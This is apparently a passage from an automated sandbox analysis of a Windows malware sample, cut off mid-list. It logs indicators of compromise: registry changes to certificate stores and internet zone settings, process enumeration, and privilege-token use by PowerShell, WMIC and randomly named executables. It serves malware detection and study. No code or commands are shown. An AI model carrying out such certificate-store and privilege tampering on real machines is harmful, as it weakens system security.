\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" AWLfpbu.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket Install.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Processes:
88ZAQZnLv9RZwKEYFq5E7vJ2.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 88ZAQZnLv9RZwKEYFq5E7vJ2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 88ZAQZnLv9RZwKEYFq5E7vJ2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 88ZAQZnLv9RZwKEYFq5E7vJ2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 88ZAQZnLv9RZwKEYFq5E7vJ2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 88ZAQZnLv9RZwKEYFq5E7vJ2.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exeAWLfpbu.exepowershell.exepowershell.exepowershell.exelTSs1ST8HHlAZfEbkonjc9k7.exe2QqwdmEprG41dAF4eJbsw6U9.exerun.exepid process 892 powershell.exe 892 powershell.exe 3400 powershell.exe 3400 powershell.exe 3400 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 2808 powershell.exe 2808 powershell.exe 2808 powershell.exe 4548 powershell.exe 4548 powershell.exe 4548 powershell.exe 4592 powershell.exe 4592 powershell.exe 4592 powershell.exe 2760 powershell.EXE 2760 powershell.EXE 2760 powershell.EXE 1004 powershell.exe 1004 powershell.exe 1004 powershell.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 648 powershell.exe 648 powershell.exe 648 powershell.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 2320 powershell.exe 2320 powershell.exe 3680 powershell.exe 3680 powershell.exe 2320 powershell.exe 3680 powershell.exe 4572 AWLfpbu.exe 4572 AWLfpbu.exe 3724 lTSs1ST8HHlAZfEbkonjc9k7.exe 3724 lTSs1ST8HHlAZfEbkonjc9k7.exe 3976 2QqwdmEprG41dAF4eJbsw6U9.exe 3976 2QqwdmEprG41dAF4eJbsw6U9.exe 1320 run.exe 1320 run.exe 1320 run.exe 4572 AWLfpbu.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
run.execmd.exepid process 1320 run.exe 436 cmd.exe 436 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exepowershell.exeCasPol.exepowershell.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe Token: SeDebugPrivilege 892 powershell.exe Token: SeDebugPrivilege 5020 CasPol.exe Token: SeDebugPrivilege 3400 powershell.exe Token: SeDebugPrivilege 4500 powershell.exe Token: SeIncreaseQuotaPrivilege 2012 WMIC.exe Token: SeSecurityPrivilege 2012 WMIC.exe Token: SeTakeOwnershipPrivilege 2012 WMIC.exe Token: SeLoadDriverPrivilege 2012 WMIC.exe Token: SeSystemProfilePrivilege 2012 WMIC.exe Token: SeSystemtimePrivilege 2012 WMIC.exe Token: SeProfSingleProcessPrivilege 2012 WMIC.exe Token: SeIncBasePriorityPrivilege 2012 WMIC.exe Token: SeCreatePagefilePrivilege 2012 WMIC.exe Token: SeBackupPrivilege 2012 WMIC.exe Token: SeRestorePrivilege 2012 WMIC.exe Token: SeShutdownPrivilege 2012 WMIC.exe Token: SeDebugPrivilege 2012 WMIC.exe Token: SeSystemEnvironmentPrivilege 2012 WMIC.exe Token: SeRemoteShutdownPrivilege 2012 WMIC.exe Token: SeUndockPrivilege 2012 WMIC.exe Token: SeManageVolumePrivilege 2012 WMIC.exe Token: 33 2012 WMIC.exe Token: 34 2012 WMIC.exe Token: 35 2012 WMIC.exe Token: 36 2012 WMIC.exe Token: SeIncreaseQuotaPrivilege 2012 WMIC.exe Token: SeSecurityPrivilege 2012 WMIC.exe Token: SeTakeOwnershipPrivilege 2012 WMIC.exe Token: SeLoadDriverPrivilege 2012 WMIC.exe Token: SeSystemProfilePrivilege 2012 WMIC.exe Token: SeSystemtimePrivilege 2012 